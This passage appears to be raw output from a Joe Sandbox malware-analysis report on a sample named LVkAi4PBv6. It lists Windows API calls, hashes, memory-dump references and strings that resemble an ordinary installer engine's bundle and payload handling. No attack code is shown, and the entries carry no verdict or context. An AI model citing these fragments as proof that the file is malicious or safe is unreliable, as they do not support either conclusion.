• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008A04F4,?,?,?,?,00000001), ref: 0089FE40
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A04F4,?,?,?,?,00000001,?,00865616,?,?,00000000,?,?,00865395,00000002), ref: 0089FE4C
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008A04F4,?,?,?,?,00000001,?,00865616,?,?), ref: 0089FEB5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00886B32,00000000,00000003), ref: 00886B9F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00886B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00886F28,?), ref: 00886BA9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • msuengine.cpp, xrefs: 00886BCD
                                                                                                                                                                                                                                                                                                  • Failed to set service start type., xrefs: 00886BD7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00893D6E
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00893D78
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 00893D85
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21ee23a08580a5daaae376d5b070e6c20b541e0da3a6703ddaeb61db1476e104
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e4b2f3cfdb9d39ffdbe868158cd1ddd8816c3b74a11d520e044096525c1d60e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ee23a08580a5daaae376d5b070e6c20b541e0da3a6703ddaeb61db1476e104
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A231B17491122CABCB21EF69D989B88BBB8FF08710F5041EAE40CA6251E7749F818F45
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d8539fcda6a0a65b6ceef7e5c863f93d54eff505bfa288f79330218382fd991
                                                                                                                                                                                                                                                                                                  • Instruction ID: d4eecd4a615cc6b4c0881b13a786b6f9670d44af8b8dee520bc22ac0cc34842a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8539fcda6a0a65b6ceef7e5c863f93d54eff505bfa288f79330218382fd991
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C4126725042186FDF20AFB8CC89EBB77B8FB80714F144668F905D7180E6319E81CB50
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 664dca5353bfb22ebbf64756a30e0d88341a77de91f07b0d82c826996ef3e27b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE02FB71E002199FDF18DFA9C8806ADBBF5FF88314F29816AD919E7384D731A941CB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008A3A8E,?), ref: 008A3C62
                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008A3AB2
                                                                                                                                                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008A3AC3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2114926846-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 36da0370f19c44ff8d5ba15958ef14d04a28a33bec49e228f18e95dd6bd6632e
                                                                                                                                                                                                                                                                                                  • Instruction ID: e0b1a3c45167799f40fd6b622ba06ff502352f8ba8ea751bdae0af7f3a2b71d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36da0370f19c44ff8d5ba15958ef14d04a28a33bec49e228f18e95dd6bd6632e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7911097190062EAFEB10DFA4DC85BAFB7B8FF09344F50482AB641E6551E770AA44CB61
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5391f5c8a1d3758eeeeee448498c277afc3d0a6d55e1fb5b338a8d9320d2f354
                                                                                                                                                                                                                                                                                                  • Instruction ID: 73c63e4a5decfbae03c0c421ad5c0493002891ac0bc4b1faa40fc7039983f6fc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5391f5c8a1d3758eeeeee448498c277afc3d0a6d55e1fb5b338a8d9320d2f354
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9801D63160160C6BDB10EFA9ED89EAAB7ACFBC6315F000065F914D3241D774AD498B58
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: 0$comres.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 0-3030269839
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0089EE77,?,?,00000008,?,?,0089EB17,00000000), ref: 0089F0A9
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0088EC20
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,0088E131), ref: 0088E9E1
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBC161331091A20FEF6D5239847417EBBE1FA927B131E179DD4B2CB1D5EE209535EA20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c13df24a428cbe3ce367fc24f02ce5cf5526301abb725c0be6735ed1006b185
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C183332091A24EEF6D5239887407EBBE1BE923B131E179DD4F2CB1C5EE209565DE60
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                                                                                                                                                  • Instruction ID: a151912d8d5f4dd248bfd860ee9da4b368341bc00d1be897e9af766cdd8085b8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCC17F321091A25EEF6D9639847407EBBE1AA923B131F179DD4F2CB1D5EE209534EE20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                                                                                                                                                  • Instruction ID: bb9b50077f38ac972ebae46a8efa8085c8afc5ab17066efb923f14cb400541b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FB184321091A24FEF2D5779883447EBBE1FA923B131E179DD4B2CB1C5EE209565EA20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4caca7aee468486897544d3bfeb5dba60f2a12944358cdc6207ef4f4711875cc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 774e81a9b15337bce1c9eb6a54d9deec73575330ca68f7334dfcdacfaa27e7e1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4caca7aee468486897544d3bfeb5dba60f2a12944358cdc6207ef4f4711875cc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC613971700B0876DF38BA6C9895BBE63A9FB41704F1C091AF983DF282DA15DE81C356
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00870592
Strings
Similarity
• API ID: Close
• String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
• API String ID: 3535843008-2755343042
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0086545D,00000000,008ACA9C,00865445,00000000), ref: 0086CEF3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find catalog., xrefs: 0086D1CE
                                                                                                                                                                                                                                                                                                  • Catalog, xrefs: 0086D0EC
                                                                                                                                                                                                                                                                                                  • Payload, xrefs: 0086CDD8
                                                                                                                                                                                                                                                                                                  • Container, xrefs: 0086CF4B
                                                                                                                                                                                                                                                                                                  • Failed to get @Packaging., xrefs: 0086D213
                                                                                                                                                                                                                                                                                                  • LayoutOnly, xrefs: 0086CF8D
                                                                                                                                                                                                                                                                                                  • SourcePath, xrefs: 0086CFB0
                                                                                                                                                                                                                                                                                                  • Failed to hex decode @CertificateRootThumbprint., xrefs: 0086D1C0
                                                                                                                                                                                                                                                                                                  • Failed to to find container: %ls, xrefs: 0086D186
                                                                                                                                                                                                                                                                                                  • Failed to hex decode the Payload/@Hash., xrefs: 0086D1DC
                                                                                                                                                                                                                                                                                                  • Failed to get @FilePath., xrefs: 0086D21A
                                                                                                                                                                                                                                                                                                  • Failed to get @SourcePath., xrefs: 0086D1F1
                                                                                                                                                                                                                                                                                                  • Failed to get @Hash., xrefs: 0086D1E3
                                                                                                                                                                                                                                                                                                  • Failed to get @Catalog., xrefs: 0086D1D5
                                                                                                                                                                                                                                                                                                  • Failed to get @Container., xrefs: 0086D18D
                                                                                                                                                                                                                                                                                                  • Failed to get @FileSize., xrefs: 0086D1AB
                                                                                                                                                                                                                                                                                                  • CertificateRootThumbprint, xrefs: 0086D07A
                                                                                                                                                                                                                                                                                                  • Failed to parse @FileSize., xrefs: 0086D1A1
                                                                                                                                                                                                                                                                                                  • Packaging, xrefs: 0086CEC6
                                                                                                                                                                                                                                                                                                  • Failed to get @CertificateRootThumbprint., xrefs: 0086D1C7
                                                                                                                                                                                                                                                                                                  • payload.cpp, xrefs: 0086CE3F
                                                                                                                                                                                                                                                                                                  • FilePath, xrefs: 0086CEAB
                                                                                                                                                                                                                                                                                                  • Failed to get next node., xrefs: 0086D228
                                                                                                                                                                                                                                                                                                  • Failed to get @DownloadUrl., xrefs: 0086D1EA
                                                                                                                                                                                                                                                                                                  • FileSize, xrefs: 0086D002
                                                                                                                                                                                                                                                                                                  • embedded, xrefs: 0086CF05
                                                                                                                                                                                                                                                                                                  • Hash, xrefs: 0086D0B7
                                                                                                                                                                                                                                                                                                  • download, xrefs: 0086CEE5
                                                                                                                                                                                                                                                                                                  • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0086D1B9
                                                                                                                                                                                                                                                                                                  • Invalid value for @Packaging: %ls, xrefs: 0086D200
                                                                                                                                                                                                                                                                                                  • external, xrefs: 0086CF21
                                                                                                                                                                                                                                                                                                  • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0086D1B2
                                                                                                                                                                                                                                                                                                  • DownloadUrl, xrefs: 0086CFD9
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for payload structs., xrefs: 0086CE49
                                                                                                                                                                                                                                                                                                  • Failed to get @Id., xrefs: 0086D221
                                                                                                                                                                                                                                                                                                  • CertificateRootPublicKeyIdentifier, xrefs: 0086D03D
                                                                                                                                                                                                                                                                                                  • Failed to get @LayoutOnly., xrefs: 0086D197
                                                                                                                                                                                                                                                                                                  • Failed to get payload node count., xrefs: 0086CE10
                                                                                                                                                                                                                                                                                                  • Failed to select payload nodes., xrefs: 0086CDEB
